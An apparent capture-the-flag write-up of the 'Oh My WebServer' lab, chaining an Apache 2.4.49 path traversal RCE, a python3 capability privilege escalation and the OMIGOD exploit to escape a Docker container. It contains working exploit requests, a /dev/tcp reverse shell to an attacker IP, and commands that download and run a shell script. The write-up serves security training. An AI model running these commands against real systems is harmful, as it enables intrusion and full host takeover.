# Oh My WebServer ## Nmap ``` nmap 10.10.170.23 -p- -Pn -sS -sV PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.49 ((Unix)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` Starting out on port 80 we arrive at the root page for CONSUULT. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FmEIxlIEALhDIeoCZNAAs%2Fimage.png?alt=media\&token=8f6fcbf8-6774-4bd3-b179-0703629638ed) Running a web application scan with `Nessus` against the target web server shows the running version of Apache is vulnerable to a critical exploit. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FXN28MiDIZ6IQcfI8htdf%2Fimage.png?alt=media\&token=3d15336b-1af3-4d53-bc9f-85e7ec0f8d0f) More details regarding the Path Traversal vulnerability are show below. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FsVlTuIMoocIqiHqMGhva%2Fimage.png?alt=media\&token=5b3d0ca4-83d2-405b-ae00-3d9075af382a) Researching publicly available exploits we find a bash script available on Exploit-db. **Exploit-db:** ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F2xpdf0LuK5xtDzIuQHCq%2Fimage.png?alt=media\&token=bff52810-af3c-4caa-ac29-2b895df0f5b1) We can take the main part of the script into single command in order to exploit the target system as shown below; we are able read the contents of `/etc/passwd`. ``` curl -s --path-as-is -d "echo Content-Type: text/plain; echo; /etc/passwd" "http://10.10.157.208/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh" ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FGxuAhXlwkHCBiLbLEC6I%2Fimage.png?alt=media\&token=47628339-6edc-4521-9268-89fc8cfb5c79) To perform easier exploitation we can send the curl request through a local proxy (burpsuite) in order to capture the request. ``` curl -x localhost:8080 -s --path-as-is -d "echo Content-Type: text/plain; echo; " "http://10.10.82.103/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash" ``` ``` POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash HTTP/1.1 Host: 10.10.82.103 User-Agent: curl/7.82.0 Accept: */* Content-Length: 52 Content-Type: application/x-www-form-urlencoded Connection: close echo Content-Type: text/plain; echo; cat /etc/passwd ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F2H1TJH19sVuaSrHUCF8s%2Fimage.png?alt=media\&token=b3dcd181-057d-43b7-a64a-29179b01048d) We can manipulate this request to receive a reverse shell. ``` POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash HTTP/1.1 Host: 10.10.82.103 User-Agent: curl/7.82.0 Accept: */* Content-Length: 77 Content-Type: application/x-www-form-urlencoded Connection: close echo Content-Type: text/plain; echo; sh -i >& /dev/tcp/10.8.239.254/4444 0>&1 ``` As shown below: ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FMmr51shHfQhZFbYdDdpQ%2Fimage.png?alt=media\&token=c91b53dc-3d08-4733-877c-59fb2a9551cd) From here we find python3 is running on the target system, as such we spawn a python3 shell. ``` /usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")' ``` Performing basic enumeration on the target system we find the IP of the system does not match that of the room. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FbSPxsHI4fTyHPT5ad8y7%2Fimage.png?alt=media\&token=5aae1ffb-096f-4841-bfa7-b1c1fa1d0202) We also find a pretty telling `.dockerenv` file in `/`. These facts combined with the system hostname, we can safely assume we are working within a docker container. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FqRZQhScG22lcValF3AwW%2Fimage.png?alt=media\&token=39b6dbfa-7ea1-482e-8afa-4f33b5abb0e3) For further enumeration `linpeas.sh` was downloaded onto the target system. ``` curl http://10.8.239.254/linpeas.sh --output linpeas.sh ``` After executing `linpeas.sh` we see that the current user has the ability to escalate privileges through capabilities set for `python3.7`. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FbNZdcGb1f7fQaiQ8xqWc%2Fimage.png?alt=media\&token=f35757c6-2742-4d2c-965d-babc728d47b7) The following command can be used to escalate to **root** within the docker container. ``` /usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")' ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FID5PvFyNPTNPg6FNfRDd%2Fimage.png?alt=media\&token=dbf14ce9-1bd1-419d-bf5b-860443b063fe) From here, we are able to grab the `user.txt` flag from `/root/`. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FwNlb6gnpb8UkPrVrthWP%2Fimage.png?alt=media\&token=c5ea3f24-aec7-49c8-9cb4-668c4b48f243) For further enumeration a static `Nmap` binary was uploaded to the target system. **Github:** ``` ./nmap 172.17.0.1 -p 1-10000 -sS -v ``` As the current container is running on 172.17.0.2 we check 172.17.0.1 which, we find is running something on port 5986. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FdYbloQpHhn3GoZ4k1UyO%2Fimage.png?alt=media\&token=2a7d2bf9-07f3-4f0b-a4a7-cbc31c250524) ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FnSmKaoksH1rp618zwxfj%2Fimage.png?alt=media\&token=677bd406-8912-4ddd-bb47-5c51864d5972) Researching the port number we find that "OMI is an [open-source](https://github.com/microsoft/omi) remote configuration management tool developed by Microsoft." According to the resource linked below this may be vulnerable to CVE-2021-38647, which could allow use to perform remote code execution on the host 172.17.0.1. **BookHackTricks:** **CVE:** **Blog:** **GitHub:** Download the Github python script from above onto the target system. ``` curl http://10.8.239.254/omigod.py --output omigod.py ``` Test for command execution: ``` python3 omigod.py -t 172.17.0.1 -c hostname ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FyZUYnSGv3dMwYNthbmy5%2Fimage.png?alt=media\&token=cbc99415-2ec2-4163-90eb-9ac11f7b1d8a) We can then create a bash reverse shell file "shell.sh" and perform RCE on the 172.17.0.1 system to download and execute from our attacking host. ``` python3 omigod.py -t 172.17.0.1 -c "curl http://10.8.239.254/shell.sh --output /tmp/shell.sh" python3 omigod.py -t 172.17.0.1 -c "bash /tmp/shell.sh" ``` Giving us a root shell on the main host. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F9c3RsejVHe0x0g56BErk%2Fimage.png?alt=media\&token=d5391c65-48b3-485e-8d7c-93630d0ca730)